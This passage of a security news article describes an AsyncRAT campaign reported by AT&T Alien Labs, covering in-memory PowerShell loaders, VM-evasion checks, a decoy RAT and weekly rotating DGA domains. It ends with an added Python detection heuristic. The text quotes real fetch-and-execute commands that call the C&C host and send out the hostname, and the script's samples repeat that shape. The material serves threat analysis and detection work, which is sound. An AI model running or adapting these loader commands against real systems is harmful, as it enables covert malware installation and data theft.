The payload is another encoded PowerShell script that is executed directly in memory, without being saved to disk, via a “conhost --headless powershell iex(curl -useb sduyvzep[.]top/1.php?hash=)” command. The domain of the C&C server is rotated periodically.
The PowerShell script executes yet another PowerShell script by invoking the iex(curl -useb “http://sduyvzep[.]top/2.php?id=$env:computername&key=$wiqnfex”) command. This sends some information to the C&C server, such as the computer hostname and a variable called $wiqnfex that indicates the likelihood of the computer being a virtual machine or sandbox. This value is set after the first script performs several checks on the system’s graphics card adapter and BIOS, which could be emulated in a VM.
If the C&C server determines that $wiqnfex indicates a valid target, the server deploys AsyncRAT. If the variable value indicates a possible VM or sandbox, it redirects the request to Google or to a different PowerShell script that downloads and launches a decoy RAT.
“When decompiled, the RAT is actually a distraction for any researchers looking into the campaign,” the Alien Labs researchers said. “The sample is a decoy made to resemble a RAT for several reasons. The assembly name is DecoyClient, and the configuration isn’t encrypted as it would be in an AsyncRAT sample. Furthermore, the sample doesn’t contain a C&C server, only loopback addresses. Moreover, among the data to be exfiltrated to the C&C, is the string ‘LOL’ or the group ‘GOVNO’.”
A new command-and-control domain every week
In addition to regularly randomizing the script code and malware samples to evade detection, the attackers also rotate the C&C domains every week. However, the Alien Labs researchers managed to reverse-engineer the domain generation algorithm, which, together with several other constants such as the TLD (.top), registrar, and organization name used to register the domains, allowed them to find the domains used in the past and obtain older samples of the deployment scripts.
“These domains were observed to carry the same features as mentioned before, with the difference of being 15 characters long,” the researchers said. “This allows us to pivot and find historical samples based off the DGA, as well as build detections to identify future infrastructure despite all their efforts to evade EDR and static detections.” The AT&T Alien Labs report includes detection signatures for this campaign that can be used with the open-source Suricata intrusion detection system, as well as a list of indicators of compromise (IOCs) that can be used to build detections for other systems.
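As an added example (not code from the Alien Labs report or this article), the loader chain from the first paragraphs and the infrastructure shape quoted here expressed as a detection heuristic over process-creation command lines; the sample command lines, the placeholder domains and the 8..15 label-length window are assumptions.

```python
# Added example (not from the AT&T Alien Labs report): flag the loader chain
# and infrastructure shape described above in process-creation command lines.
import re
from urllib.parse import parse_qs, urlparse

# Stage 1: conhost --headless starts powershell, which fetches a script with
# curl -useb and runs it in memory through iex (Invoke-Expression).
LOADER_RE = re.compile(
    r"conhost\s+-{1,2}headless\s+powershell\b.*\biex\s*\(\s*curl\s+-useb\b",
    re.IGNORECASE | re.DOTALL)
# Stage 2 sends the hostname and the VM-check variable as query parameters.
EXFIL_RE = re.compile(r"\$env:computername.*&key=\$\w+", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"')]+", re.IGNORECASE)

def stage_of(url: str) -> int:
    """1 or 2 for the reported stage shapes (1.php?hash=, 2.php?id=&key=), else 0."""
    parsed = urlparse(url)
    keys = set(parse_qs(parsed.query, keep_blank_values=True))
    if parsed.path.endswith("/1.php") and keys == {"hash"}:
        return 1
    if parsed.path.endswith("/2.php") and keys == {"id", "key"}:
        return 2
    return 0

def dga_like(host: str) -> bool:
    """Low-confidence pivot: a .top domain with one lowercase alphabetic label.
    The 8..15 length window is an assumption covering both reported variants."""
    label, _, tld = host.rpartition(".")
    return tld == "top" and label.isalpha() and 8 <= len(label) <= 15

def classify(cmdline: str) -> list[str]:
    """Return every detection reason that fires for one command line."""
    hits = []
    if LOADER_RE.search(cmdline):
        hits.append("conhost-headless-iex-curl")
    if EXFIL_RE.search(cmdline):
        hits.append("hostname-and-vmcheck-exfil")
    for url in URL_RE.findall(cmdline):
        stage = stage_of(url)
        if stage:
            hits.append(f"stage{stage}-request")
        if dga_like(urlparse(url).hostname or ""):
            hits.append("dga-like-top-domain")
    return hits

# Constructed sample command lines (placeholder domains, not real IOCs).
SAMPLES = [
    "conhost --headless powershell iex(curl -useb http://abcdefghijklmno.top/1.php?hash=)",
    'powershell iex(curl -useb "http://abcdefghijklmno.top/2.php?id=$env:computername&key=$wiqnfex")',
    'powershell -Command "Get-ChildItem C:\\Users | curl -useb http://example.com/"',
]
```

The domain check alone is too broad to alert on; it is meant to raise confidence only when it co-occurs with the loader or exfil signals in the same event.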